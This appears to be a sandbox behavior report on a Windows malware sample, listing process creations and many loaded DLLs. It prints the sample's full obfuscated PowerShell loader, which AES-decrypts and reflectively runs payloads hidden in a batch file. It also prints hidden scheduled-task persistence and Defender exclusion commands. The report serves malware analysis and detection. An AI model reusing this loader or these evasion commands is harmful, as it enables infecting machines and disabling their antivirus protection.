'')('C:\Users\user\Desktop\startup_str_466.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_533_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_533.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -ForceJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_533.vbs" Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_533.bat" "Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_533.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_533.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft Edge.exe'Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft Edge.exe'Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Roaming\Microsoft Edge.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: avicap32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvfw32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
